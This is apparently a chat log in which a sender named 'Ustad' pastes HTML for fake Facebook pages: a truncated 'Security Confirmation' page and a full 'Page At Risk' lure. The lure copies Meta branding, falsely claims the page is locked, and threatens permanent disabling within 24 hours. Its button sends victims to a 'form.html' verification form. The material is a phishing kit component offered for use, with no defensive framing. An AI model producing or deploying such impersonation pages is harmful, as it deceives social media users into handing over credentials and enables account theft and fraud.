[7:16 pm, 26/01/2026] Ustad: <html lang="en"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Facebook Security Confirmation</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
  <style>
    body {
      font-family: 'Helvetica Neue', Arial, sans-serif;
      background-color: #f0f2f5;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }

    .container {
      background-color: white;
      padding: 40px 30px;
      border-radius: 10px;
      box-shadow: 0px 6px 18px rgba(0, 0, 0, 0.1);
      width: 400px;
      max-width: 90%;
    }

    .logo {
      text-align: left;
      margin-bo…
[11:18 pm, 26/01/2026] Ustad: <!DOCTYPE html>

<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Page At Risk - Facebook</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
        }

        body {
            background-color: #f0f2f5;
            color: #1c1e21;
            line-height: 1.34;
        }

        .container {
            max-width: 500px;
            margin: 40px auto;
            padding: 20px;
            background: white;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }

        .header {
            text-align: center;
            padding: 20px 0;
            border-bottom: 1px solid #dadde1;
        }

        .logo {
            color: #1877f2;
            font-size: 42px;
            font-weight: bold;
            margin-bottom: 15px;
        }

        h1 {
            font-size: 20px;
            font-weight: 600;
            margin-bottom: 16px;
        }

        .alert-box {
            background-color: #fff8e1;
            border-left: 4px solid #ffc107;
            padding: 12px 16px;
            margin: 20px 0;
            border-radius: 4px;
        }

        .alert-title {
            font-weight: 600;
            margin-bottom: 8px;
            color: #d32f2f;
        }

        .content {
            padding: 20px 0;
        }

        p {
            margin-bottom: 16px;
            color: #606770;
        }

        .support-option {
            display: flex;
            align-items: center;
            padding: 12px;
            border: 1px solid #dddfe2;
            border-radius: 8px;
            margin-bottom: 12px;
            cursor: pointer;
            transition: background-color 0.2s;
        }

        .support-option:hover {
            background-color: #f5f6f7;
        }

        .support-icon {
            width: 40px;
            height: 40px;
            background-color: #e7f3ff;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-right: 12px;
            color: #1877f2;
            font-size: 18px;
        }

        .support-text {
            flex: 1;
        }

        .support-title {
            font-weight: 600;
            margin-bottom: 2px;
        }

        .support-desc {
            font-size: 13px;
            color: #65676b;
        }

        .btn {
            width: 100%;
            padding: 12px;
            border-radius: 6px;
            font-weight: 600;
            font-size: 16px;
            cursor: pointer;
            border: none;
            margin-top: 16px;
        }

        .btn-primary {
            background-color: #1877f2;
            color: white;
        }

        .btn-primary:hover {
            background-color: #166fe5;
        }

        .footer {
            text-align: center;
            margin-top: 20px;
            padding-top: 20px;
            border-top: 1px solid #dadde1;
            color: #8a8d91;
            font-size: 12px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="header">
            <div class="logo">facebook</div>
            <h1>Your Page Has Been Flagged</h1>
        </div>

        <div class="alert-box">
            <div class="alert-title">Important Security Alert</div>
            <div>We've detected unusual activity on your account or page and we have temporarily locked your page to protect your information.</div>
        </div>

        <div class="content">
            <p>To secure your page and restore access, please complete the verification process. This helps us confirm you're the rightful account owner.</p>

            <div class="support-option">
                <div class="support-icon">!</div>
                <div class="support-text">
                    <div class="support-title">Page Verification Required</div>
                    <div class="support-desc">Complete identity confirmation to unlock your page</div>
                </div>
            </div>

            <p>You have <strong>24 hours</strong> to verify your page before it's permanently disabled for violating our Community Standards.</p>

            <button class="btn btn-primary" onclick="window.location.href='form.html'">
                Begin Verification
            </button>
        </div>

        <div class="footer">
            <div>Meta © 2025</div>
            <div style="margin-top: 8px;">You can learn more about why we suspend page by visiting the Community Standards.</div>
        </div>
    </div>
</body>

</html>
